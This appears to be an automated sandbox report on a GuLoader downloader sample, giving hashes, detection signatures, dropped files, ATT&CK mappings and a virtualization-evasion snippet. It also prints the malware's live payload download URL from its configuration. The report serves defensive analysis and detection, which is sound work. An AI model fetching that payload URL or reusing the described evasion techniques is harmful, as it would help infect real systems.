Edit tour

Windows Analysis Report
aSsc9zh1ex

Overview

General Information

Sample Name:	aSsc9zh1ex (renamed file extension from none to exe)
Analysis ID:	625008
MD5:	d5e55a57372bcad45fbb260105179caf
SHA1:	9b1935a927c072dd31017362ff1739bf1ea2aaf7
SHA256:	3c27c2aa1bc826faa65ab4038eb385cabd6db50108410e6f674d455aa1dc5532
Tags:	32exetrojan
Infos:

Detection

GuLoader

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Tries to detect virtualization through RDTSC time measurements

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Sample file is different than original file name gathered from version info

PE file contains strange resources

Drops PE files

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Detected potential crypto function

PE file contains more sections than normal

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

aSsc9zh1ex.exe (PID: 4152 cmdline: "C:\Users\user\Desktop\aSsc9zh1ex.exe" MD5: D5E55A57372BCAD45FBB260105179CAF)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://barsam.com.au/bin_QuCucbUMda229.bin"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.886415142.0000000002D70000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000001.00000002.886415142.0000000002D70000.00000040.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://barsam.com.au/bin_QuCucbUMda229.bin"}

Multi AV Scanner detection for submitted file

Source: aSsc9zh1ex.exe	Virustotal: Detection: 37%	Perma Link
Source: aSsc9zh1ex.exe	Metadefender: Detection: 14%	Perma Link
Source: aSsc9zh1ex.exe	ReversingLabs: Detection: 34%

Source: aSsc9zh1ex.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: aSsc9zh1ex.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: D:\SourceCode\GC3.UserExperienceImprovement\production_V4.2\Service\ServiceSDK\Release\UserExperienceImprovementPlugin\AsSQLHelper.pdb source: AsSQLHelper.dll.1.dr
Source:	Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIINVHelper.pdb source: AEGISIIINVHelper.dll.1.dr

Source: C:\Users\user\Desktop\aSsc9zh1ex.exe	Code function: 1_2_00406850 FindFirstFileW,FindClose,	1_2_00406850
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe	Code function: 1_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	1_2_00405C26
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe	Code function: 1_2_0040290B FindFirstFileW,	1_2_0040290B

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://barsam.com.au/bin_QuCucbUMda229.bin

Source: aSsc9zh1ex.exe, 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp, AsSQLHelper.dll.1.dr, wxbase30u_xml_gcc_custom.dll.1.dr, AEGISIIINVHelper.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: aSsc9zh1ex.exe, 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp, AsSQLHelper.dll.1.dr, wxbase30u_xml_gcc_custom.dll.1.dr, AEGISIIINVHelper.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr	String found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
Source: AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
Source: AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr	String found in binary or memory: http://crl.globalsign.com/root.crl0G
Source: aSsc9zh1ex.exe, 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp, wxbase30u_xml_gcc_custom.dll.1.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: aSsc9zh1ex.exe, 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp, AsSQLHelper.dll.1.dr, wxbase30u_xml_gcc_custom.dll.1.dr, AEGISIIINVHelper.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: aSsc9zh1ex.exe, 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp, AsSQLHelper.dll.1.dr, wxbase30u_xml_gcc_custom.dll.1.dr, AEGISIIINVHelper.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: aSsc9zh1ex.exe, 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp, AsSQLHelper.dll.1.dr, wxbase30u_xml_gcc_custom.dll.1.dr, AEGISIIINVHelper.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: aSsc9zh1ex.exe, 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp, AsSQLHelper.dll.1.dr, wxbase30u_xml_gcc_custom.dll.1.dr, AEGISIIINVHelper.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: aSsc9zh1ex.exe, 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp, wxbase30u_xml_gcc_custom.dll.1.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: aSsc9zh1ex.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: aSsc9zh1ex.exe, 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp, AsSQLHelper.dll.1.dr, wxbase30u_xml_gcc_custom.dll.1.dr, AEGISIIINVHelper.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: aSsc9zh1ex.exe, 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp, AsSQLHelper.dll.1.dr, wxbase30u_xml_gcc_custom.dll.1.dr, AEGISIIINVHelper.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr	String found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: aSsc9zh1ex.exe, 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp, wxbase30u_xml_gcc_custom.dll.1.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr	String found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
Source: AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
Source: aSsc9zh1ex.exe, 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp, AsSQLHelper.dll.1.dr, wxbase30u_xml_gcc_custom.dll.1.dr, AEGISIIINVHelper.dll.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: aSsc9zh1ex.exe, 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp, wxbase30u_xml_gcc_custom.dll.1.dr	String found in binary or memory: https://sectigo.com/CPS0C
Source: aSsc9zh1ex.exe, 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp, AsSQLHelper.dll.1.dr, wxbase30u_xml_gcc_custom.dll.1.dr, AEGISIIINVHelper.dll.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Source: C:\Users\user\Desktop\aSsc9zh1ex.exe

Code function: 1_2_004056BB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

1_2_004056BB

Source: aSsc9zh1ex.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: aSsc9zh1ex.exe, 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp

Binary or memory string: OriginalFilenamewxbase30u_xml_gcc_custom.dll4 vs aSsc9zh1ex.exe

Source: aSsc9zh1ex.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\aSsc9zh1ex.exe

Code function: 1_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

1_2_0040350A

Source: C:\Users\user\Desktop\aSsc9zh1ex.exe

Code function: 1_2_732D1BFF

1_2_732D1BFF

Source: wxbase30u_xml_gcc_custom.dll.1.dr

Static PE information: Number of sections : 12 > 10

Source: C:\Users\user\Desktop\aSsc9zh1ex.exe

Process Stats: CPU usage > 98%

Source: aSsc9zh1ex.exe	Virustotal: Detection: 37%
Source: aSsc9zh1ex.exe	Metadefender: Detection: 14%
Source: aSsc9zh1ex.exe	ReversingLabs: Detection: 34%

Source: C:\Users\user\Desktop\aSsc9zh1ex.exe

File read: C:\Users\user\Desktop\aSsc9zh1ex.exe

Jump to behavior

Source: aSsc9zh1ex.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\aSsc9zh1ex.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\aSsc9zh1ex.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\aSsc9zh1ex.exe

1_2_0040350A

Source: C:\Users\user\Desktop\aSsc9zh1ex.exe

File created: C:\Users\user\AppData\Local\Temp\nsw48CC.tmp

Jump to behavior

Source: classification engine

Classification label: mal72.troj.evad.winEXE@1/8@0/0

Source: C:\Users\user\Desktop\aSsc9zh1ex.exe

Code function: 1_2_004021AA CoCreateInstance,

1_2_004021AA

Source: C:\Users\user\Desktop\aSsc9zh1ex.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\aSsc9zh1ex.exe

Code function: 1_2_00404967 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

1_2_00404967

Source: aSsc9zh1ex.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: D:\SourceCode\GC3.UserExperienceImprovement\production_V4.2\Service\ServiceSDK\Release\UserExperienceImprovementPlugin\AsSQLHelper.pdb source: AsSQLHelper.dll.1.dr
Source:	Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIINVHelper.pdb source: AEGISIIINVHelper.dll.1.dr

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000001.00000002.886415142.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\aSsc9zh1ex.exe

Code function: 1_2_732D30C0 push eax; ret

1_2_732D30EE

Source: wxbase30u_xml_gcc_custom.dll.1.dr

Static PE information: section name: .xdata

Source: C:\Users\user\Desktop\aSsc9zh1ex.exe

Code function: 1_2_732D1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

1_2_732D1BFF

Source: C:\Users\user\Desktop\aSsc9zh1ex.exe	File created: C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dll	Jump to dropped file
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe	File created: C:\Users\user\AppData\Local\Temp\wxbase30u_xml_gcc_custom.dll	Jump to dropped file
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe	File created: C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe	File created: C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll	Jump to dropped file

Source: C:\Users\user\Desktop\aSsc9zh1ex.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\aSsc9zh1ex.exe

RDTSC instruction interceptor: First address: 0000000002D70A78 second address: 0000000002D70A78 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FED00ACE4BAh 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc

Source: C:\Users\user\Desktop\aSsc9zh1ex.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dll	Jump to dropped file
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wxbase30u_xml_gcc_custom.dll	Jump to dropped file
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll	Jump to dropped file

Source: C:\Users\user\Desktop\aSsc9zh1ex.exe	Code function: 1_2_00406850 FindFirstFileW,FindClose,	1_2_00406850
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe	Code function: 1_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	1_2_00405C26
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe	Code function: 1_2_0040290B FindFirstFileW,	1_2_0040290B

Source: C:\Users\user\Desktop\aSsc9zh1ex.exe	API call chain: ExitProcess graph end node			graph_1-4642
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe	API call chain: ExitProcess graph end node			graph_1-4799

Source: C:\Users\user\Desktop\aSsc9zh1ex.exe

Code function: 1_2_732D1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

1_2_732D1BFF

Source: C:\Users\user\Desktop\aSsc9zh1ex.exe

1_2_0040350A

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	Path Interception	1 Access Token Manipulation	1 Access Token Manipulation	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Obfuscated Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	1 Clipboard Data	Exfiltration Over Bluetooth	1 Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	13 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
aSsc9zh1ex.exe	38%	Virustotal		Browse
aSsc9zh1ex.exe	14%	Metadefender		Browse
aSsc9zh1ex.exe	34%	ReversingLabs	Win32.Downloader.GuLoader

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://barsam.com.au/bin_QuCucbUMda229.bin	0%	Avira URL Cloud	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	URL Reputation	safe
https://sectigo.com/CPS0C	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://barsam.com.au/bin_QuCucbUMda229.bin	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	aSsc9zh1ex.exe, 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp, wxbase30u_xml_gcc_custom.dll.1.dr	false	URL Reputation: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	aSsc9zh1ex.exe	false		high
http://ocsp.sectigo.com0	aSsc9zh1ex.exe, 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp, wxbase30u_xml_gcc_custom.dll.1.dr	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	aSsc9zh1ex.exe, 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp, wxbase30u_xml_gcc_custom.dll.1.dr	false	URL Reputation: safe	unknown
https://sectigo.com/CPS0C	aSsc9zh1ex.exe, 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp, wxbase30u_xml_gcc_custom.dll.1.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	625008
Start date and time: 12/05/202210:30:45	2022-05-12 10:30:45 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	aSsc9zh1ex (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal72.troj.evad.winEXE@1/8@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 85.5% (good quality ratio 84.2%) Quality average: 87% Quality standard deviation: 21.8%
HCA Information:	Successful, ratio: 100% Number of executed functions: 33 Number of non-executed functions: 34
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 40.125.122.176
Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, glb.sls.prod.dcat.dsp.trafficmanager.net
Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dll	TransportLabel_6170453602.xlsx	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dll	OR17233976_00019489_20170619154218.xlsx	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll	TransportLabel_6170453602.xlsx	Get hash	malicious	Browse
	OR17233976_00019489_20170619154218.xlsx	Get hash	malicious	Browse
	DWG-1579.exe	Get hash	malicious	Browse
	RFQ-1579.exe	Get hash	malicious	Browse
	DWG-1579.exe	Get hash	malicious	Browse
	RFQ-1579.xlsx	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dll

Download File

Process:	C:\Users\user\Desktop\aSsc9zh1ex.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	60648
Entropy (8bit):	6.273540391388373
Encrypted:	false
SSDEEP:	768:VyIscWONgNnXigWuv3uuCRCF5AElVllzCix92FBo/SlOKsVjiVsRb2X9bhM:VDt5Ngg23TgNElDNeo/8OLjiOR6
MD5:	00B917A158BB5BF0D6BFF7D6B3C81B12
SHA1:	24A9B80C8EC794ADA4C8BAF717CFAB98459AC1DE
SHA-256:	947BE059906893C09F222CB2868631638A219FB905A47E16A311BA5ADEB4B300
SHA-512:	47B8EABDF404E19B2D953933D2D0C922CC538B3876D7664110CBD739605FFD151D24788E60B9935E6E4F7BB463F6BC7CED253CF31ED5C4D210495C301C7E5F45
Malicious:	false
Antivirus:	Antivirus: Virustotal, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: TransportLabel_6170453602.xlsx, Detection: malicious, Browse Filename: OR17233976_00019489_20170619154218.xlsx, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........P..K1.K1.K1.BIX.G1..Y.I1....J1..Y.D1..Y.C1..Y.H1.BIO.J1.BIH.J1.8S.N1.K1..1..X.H1..X.J1..X4.J1.K1\.J1..X.J1.RichK1.................PE..d....5;a.........." .........j...............................................0...... .....`.........................................`...................H.................... ..4.......p............................................... ............................text............................... ..`.rdata.. -..........................@..@.data...`'..........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..4.... ......................@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll

Download File

Process:	C:\Users\user\Desktop\aSsc9zh1ex.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36576
Entropy (8bit):	6.18658407883376
Encrypted:	false
SSDEEP:	384:Vw33667/fhcAcwuVQydIDddeypaROhGkXMV3lBhjUK98krmRt8ZrqL1r8/lSNriq:q33oWsUK98vAqL1r8oFiQ7b2X9shHf
MD5:	0B849C073801DCE25301ECA0146D534B
SHA1:	5BB9251CA83FE96C8F52B35637E674A629ED1468
SHA-256:	3F77E9EF8843DE3DA37037F21BCF6D7E990085D2BDC5B3F05E71AB5EBE5288BB
SHA-512:	1C5C99BD93FBACD3BA56ADE806092AB86BA3FEA0BB70DE0FB89775285A71DB47F2400CF29757370CDC69F13FCBCF6513B25F4C8BBED0A15D65A9618BEE733A7F
Malicious:	false
Antivirus:	Antivirus: Virustotal, Detection: 0%, Browse Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: TransportLabel_6170453602.xlsx, Detection: malicious, Browse Filename: OR17233976_00019489_20170619154218.xlsx, Detection: malicious, Browse Filename: DWG-1579.exe, Detection: malicious, Browse Filename: RFQ-1579.exe, Detection: malicious, Browse Filename: DWG-1579.exe, Detection: malicious, Browse Filename: RFQ-1579.xlsx, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_.%.>.v.>.v.>.v.FNv.>.v.\.w.>.v.V.w.>.v.V.w.>.v.V.w.>.v.V.w.>.v.`.w.>.v.>.v.>.v!W.w.>.v!W.w.>.v!W"v.>.v.>Jv.>.v!W.w.>.vRich.>.v........................PE..d......a.........." .....>...\.......@.................................................... .........................................pd..l....d.......................p..........H....T..p...........................`U...............P...............................text....<.......>.................. ..`.rdata.......P.......B..............@..@.data...0....p.......`..............@....pdata...............b..............@..@.rsrc................h..............@..@.reloc..H............n..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\CoverDes.exe.manifest

Download File

Process:	C:\Users\user\Desktop\aSsc9zh1ex.exe
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1070
Entropy (8bit):	4.836891219007383
Encrypted:	false
SSDEEP:	24:JdtGOiNK+bIg4y3QdM/Ai8qTCNzgDQRnKVGaQkl:3U1K+bIg4y3QdaIzgDQh3aQkl
MD5:	9B48061E7B9FC35CD2624F2B9102549E
SHA1:	9DA640A8AF809549031916AB143026FAAF3B1E74
SHA-256:	84839C6E85F9B73AA6B0F331A9EAADF7409B7B36E30BA0B04E31680069103E43
SHA-512:	01CF7B5CBDEB1038E79076CB452AC63B0037C86570C3FE97B6C559823F43D515F34CAC963D3737B9EAF103F0EBDEBC1317B68091D4332C3615E87A3F25DF679E
Malicious:	false
Reputation:	low
Preview:	.<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <dependency>.. <dependentAssembly>.. <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" />.. </dependentAssembly>.. </dependency>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">.. <security>.. <requestedPrivileges>.. <requestedExecutionLevel level="asInvoker" uiAccess="false" />.. </requestedPrivileges>.. </security>.. </trustInfo>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="NeGACOM" type="win32" version="17.0.0.0" processorArchitecture="x86" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="OnlineServices" version="17.0.0

C:\Users\user\AppData\Local\Temp\Strepera.wad

Download File

Process:	C:\Users\user\Desktop\aSsc9zh1ex.exe
File Type:	data
Category:	dropped
Size (bytes):	77432
Entropy (8bit):	6.5191464617024995
Encrypted:	false
SSDEEP:	1536:0ryhqjc8wTqJ39FNvl4UXgmBfCotcEntclFVdwJZp:0ryTk3HdyYgmBfCscEilFVG
MD5:	0CAED7F18389A6CC24391E0400C2BE47
SHA1:	59288CED440D46970090F25983B409BB25F43BBF
SHA-256:	E8C48296D444C8EDBF6169CA9E3C5334B0813BFC684C2E99BFD61C692A3784F1
SHA-512:	AFC59C8EA01D5F96DFAB3CD08F088FF2136542C0F13435EE9D63795CD8BDEF6D746408296883CD9052BF21D6E87388295B4682F06913CC982B21868704277B93
Malicious:	false
Reputation:	low
